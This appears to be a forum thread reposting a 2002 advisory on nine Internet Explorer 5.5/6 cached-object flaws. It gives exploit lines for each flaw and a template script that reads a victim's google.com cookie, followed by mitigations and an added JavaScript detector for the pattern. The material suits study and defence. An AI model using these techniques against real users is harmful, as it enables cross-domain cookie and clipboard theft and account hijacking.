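Floor 600#
Posted: 2002-10-26 22:26
Although all nine of these security vulnerabilities are caused by the same class of object, each one is a separate vulnerability and can be used on its own for a malicious attack. The nine vulnerabilities are listed in the table below. The description of each vulnerability has three parts: "Cache" shows how the flawed object is used, "Exploit" shows how the flaw is verified in context, and "Impact" gives the security threat posed by the flaw ("Full access" means that full control of the target system can be obtained, including unauthorized access to any of the victim's files, forging arbitrary URLs, and unauthorized execution of arbitrary commands).
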
Floor 601#
Posted: 2002-10-26 22:26
1. showModalDialog
Cache: var fVuln=oWin.showModalDialog;
Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability.
Impact: Full access in IE5.5, "My Computer" zone access in IE6.

Floor 602#
Posted: 2002-10-26 22:27
2. external
Cache: var oVuln=oWin.external;
Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
Impact: Full access.

Floor 603#
Posted: 2002-10-26 22:27
3. createRange
Cache: var fVuln=oWin.document.selection.createRange;
Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");
Impact: Full access.

Floor 604#
Posted: 2002-10-26 22:28
4. elementFromPoint
Cache: var fVuln=oWin.document.elementFromPoint;
Exploit: alert(fVuln(1,1).document.cookie);
Impact: Full access.

Floor 605#
Posted: 2002-10-26 22:28
5. getElementById
Cache: var fVuln=oWin.document.getElementById;
Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);
Impact: Full access.

Floor 606#
Posted: 2002-10-26 22:29
6. getElementsByName
Cache: var fVuln=oWin.document.getElementsByName;
Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
Impact: Full access.

Floor 607#
Posted: 2002-10-26 22:29
7. getElementsByTagName
Cache: var fVuln=oWin.document.getElementsByTagName;
Exploit: alert(fVuln("BODY")[0].document.cookie);
Impact: Full access.

Floor 608#
Posted: 2002-10-26 22:29
8. execCommand
Cache: var fVuln=oWin.document.execCommand;
Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text"));
Impact: Read access to the loaded document.

Floor 609#
Posted: 2002-10-26 22:30
9. clipboardData
Cache: var oVuln=oWin.clipboardData;
Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");
Impact: Read/write access to the clipboard, regardless of settings.

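Floor 610#
Posted: 2002-10-26 22:30
Affected software:
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Earlier versions and IE6 SP1 are not affected by this flaw.
Note that any other application that uses the IE browser engine is also affected.
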
Floor 611#
Posted: 2002-10-26 22:31
Test platforms:
IE5.5 Win98
IE5.5 NT4
IE6 Win98
IE6 Win2000
IE6 WinXP

Floor 612#
Posted: 2002-10-26 22:31
Attack method:
The following code can be used to illegitimately obtain the victim's "google.com" cookie:
<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
location.href="http://google.com";
setTimeout(
    function () {
        [Exploit line(s) here]
    },
    3000
);
</script>

Floor 613#
Posted: 2002-10-26 22:31
Solution:
Disable Active Scripting
Use IE6 SP1

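An added example, not part of any post in this thread: a heuristic static check that flags script source which copies one of the nine listed members off a window returned by open() into a variable without calling it, and notes whether a navigation follows, which is the shape of the template in floor 612. The function name, the regexes and both sample scripts are constructed for illustration, and a regex scan like this will miss obfuscated code.

```javascript
// Added example (not from the thread): heuristic static check for the
// cached-reference pattern. Member names come from the nine items listed
// above; function names and both sample scripts are constructed.
const CACHED_MEMBERS = [
  "showModalDialog", "external", "clipboardData",
  "document.selection.createRange", "document.elementFromPoint",
  "document.getElementById", "document.getElementsByName",
  "document.getElementsByTagName", "document.execCommand",
];

function findCachedReferences(source) {
  // Step 1: variables holding a window returned by open()/window.open().
  const winVars = new Set();
  const openRe = /(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*(?:window\.)?open\s*\(/g;
  for (const m of source.matchAll(openRe)) winVars.add(m[1]);

  // Step 2: assignments that copy a listed member off such a window
  // without calling it (the member name is not followed by "(").
  const assignRe =
    /(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*([A-Za-z_$][\w$]*)\.([\w$.]+)\s*(?=[;\n]|$)/g;
  const navRe = /\blocation(?:\.href)?\s*=/;
  const findings = [];
  for (const m of source.matchAll(assignRe)) {
    const [, cacheVar, owner, member] = m;
    if (!winVars.has(owner) || !CACHED_MEMBERS.includes(member)) continue;
    // Step 3: note whether a navigation follows the cached assignment.
    const rest = source.slice(m.index + m[0].length);
    findings.push({ cacheVar, owner, member, navigatesAfter: navRe.test(rest) });
  }
  return findings;
}

// Constructed samples: the first mirrors the template's cache-then-navigate
// shape, the second is an ordinary immediate call on a child window.
const SUSPICIOUS = [
  'var oWin=open("blank.html","victim","width=100,height=100");',
  'var fVuln=oWin.document.getElementById;',
  'location.href="http://example.test/";',
].join("\n");
const BENIGN = [
  'var w = window.open("help.html");',
  'var el = w.document.getElementById("title");',
].join("\n");

console.log(findCachedReferences(SUSPICIOUS));
console.log(findCachedReferences(BENIGN));
```
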
Floor 614#
Posted: 2002-10-27 01:14
Phew, phew, finally made it in time

Floor 615#
Posted: 2002-10-27 01:15
Quote: Phew, phew, finally made it in time
Lucky for you that you made it in time :D

Floor 616#
Posted: 2002-10-27 01:20
Coincidence, just a coincidence. Carry on, everyone, carry on

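Floor 617#
Posted: 2002-10-27 01:22
Quote: Coincidence, just a coincidence. Carry on, everyone, carry on
Hehe, you just keep on sleepwalking, I'm off to get a late-night snack :D :D :D
Also, I don't chew the cud :D :D :D
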
Floor 618#
Posted: 2002-10-27 01:23
Go on, go on, don't choke

Floor 619#
Posted: 2002-10-27 09:14
Nobody shows up on the day points are being given out? :(